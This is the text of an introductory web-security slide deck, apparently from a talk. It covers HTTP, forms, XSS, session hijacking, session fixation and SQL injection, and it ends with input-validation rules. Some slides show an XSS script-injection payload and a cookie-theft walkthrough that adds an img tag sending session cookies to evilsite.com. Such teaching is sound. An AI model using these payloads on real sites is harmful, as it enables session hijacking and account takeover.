2. Who are you?
• Open source hacker
• github.com/bobtfish/
• Perl guy (sorry) - 160 CPAN modules
• Core team for Catalyst and Plack web
frameworks.
• Ex professional security tester / R&D
22. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics
23. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
24. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
• Can almost always be sloppy - browser
tries to do the right thing.
39. Dynamic
• The response could just be a file on disc
• HTML, image, etc
• We’re interested about when it’s dynamic -
i.e. when your input changes the HTML
output.
40. GET / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 29 Aug 2012 21:47:59 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
ETag: "1c888b-0-4a90a5e239540"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
48. GET / HTTP/1.0
• Headers optional after first line
• Body can be supplied after rnrn if you
specify a non-zero content length
49. GET / HTTP/1.0
• Headers optional after first line
• Body can be supplied after rnrn if you
specify a non-zero content length
• There will be examples of this later
52. HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
53. HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
• 200 is response code.
• 2xx - Success
• 3xx - Redirect
• 4xx - User error
• 5xx - Server error
54. Date: Wed, 29 Aug 2012
21:47:59 GMT
• Other headers now follow. All in format:
Key:Value
• Date: RFC822
• Optional
58. Accept-Ranges: bytes
• ‘Partial GET’
• Ask for a byte range in the file
• Get back just that part
• Used by ‘download managers’ to resume
• Optional
71. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
urlencoded
72. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
urlencoded
• Has a Content-Length, and a body
73. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
urlencoded
• Has a Content-Length, and a body
• Data is encoded like this:
foo=bar&foo2=baz
74. POST
POST / HTTP/1.1
Host: www.example.com
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
foo=bar&foo2=quux
75. Forms
• HTML forms are the primary means of
getting user data to the server
• Data is in the body, not the URL, so they
don’t get saved in bookmarks
• <form> tag
• <input> tag
84. FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
85. FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
• Golden rule - never ever accept input
without validating it’s sane
86. FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
• Golden rule - never ever accept input
without validating it’s sane
• Golden rule - never ever output anything
that may have come from external input
without encoding it
89. WHY?
• You can send: ?foo="><blink>Foo<
%2Fblink>
• Comes out as: <input name="foo"
value=""><blink>Foo</blink>
90. WHY?
• You can send: ?foo="><blink>Foo<
%2Fblink>
• Comes out as: <input name="foo"
value=""><blink>Foo</blink>
• You just added HTML to the document -
fail!
94. Javascript
• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
95. Javascript
• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
• foo="><script>document.removeChild(doc
ument.getElementsByTagName('html')[0])<
%2Fscript>
104. More theory
• Sorry, but it’s necessary
• People’s credit card numbers are behind
login pages
105. More theory
• Sorry, but it’s necessary
• People’s credit card numbers are behind
login pages
• So we have to understand how logins work
to steal them
120. Sessions
• Hand each visitor a random session token,
identify them in future
• Login credentials only transmitted once
121. Sessions
• Hand each visitor a random session token,
identify them in future
• Login credentials only transmitted once
• Allows login to be SSL (and rest of site not)
127. Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie
128. Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie
• “Same origin policy” - cannot transmit
elsewhere.
129. Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie
• “Same origin policy” - cannot transmit
elsewhere.
• Cheat! Add content to the document.
132. Lets step through that
• Message board site gives users a cookie
when they login
133. Lets step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token
134. Lets step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token
• You post an evil message containing
Javascript
135. Lets step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token
• You post an evil message containing
Javascript
• Other users view your message
137. Lets step through that
• Other user’s browsers execute your
javascript
138. Lets step through that
• Other user’s browsers execute your
javascript
• It grabs their cookie
139. Lets step through that
• Other user’s browsers execute your
javascript
• It grabs their cookie
• Adds to their page: <img src=”http://
evilsite.com/?data=cookie_data” />
140. Lets step through that
• Other user’s browsers execute your
javascript
• It grabs their cookie
• Adds to their page: <img src=”http://
evilsite.com/?data=cookie_data” />
• Users browser tries to download image
143. Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif
144. Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif
• I can now post messages as any (still logged
in) user who viewed my message.
145. Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif
• I can now post messages as any (still logged
in) user who viewed my message.
• Having the users’s cookie allows you to
become the user
147. Did you notice the
handwave?
• I need a way to get your cookie into my
browser
148. Did you notice the
handwave?
• I need a way to get your cookie into my
browser
• This is easy to do - find a proxy library in
your favourite programming language ;P
149. Did you notice the
handwave?
• I need a way to get your cookie into my
browser
• This is easy to do - find a proxy library in
your favourite programming language ;P
• Or tools you can just download
153. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like
• Useful for abusing XSS elsewhere
154. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
XSS.
155. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
XSS.
• /?sessionID=XXXXXXXXXXX
169. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
170. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
name = ‘fred’ AND password = ‘example’;
171. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
name = ‘fred’ AND password = ‘example’;
• SAME ISSUE AS BEFORE
179. Golden Rules
• Never ever accept input without validating
it’s sane.
• Never ever output anything that may have
come from external input without encoding
it.
180. Thanks for listening!
• Hope that wasn’t too boring :)
• Feel free to come chat to me.
• Or mail me: bobtfish@bobtfish.net
• Or grab me on irc: t0m on Freenode
• More in-depth workshop on Sunday!
Editor's Notes
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
Add a mandatory &#x2018;Host&#x2019; header\nWe have run out of IP addresses - this means you can have multiple sites per IP\n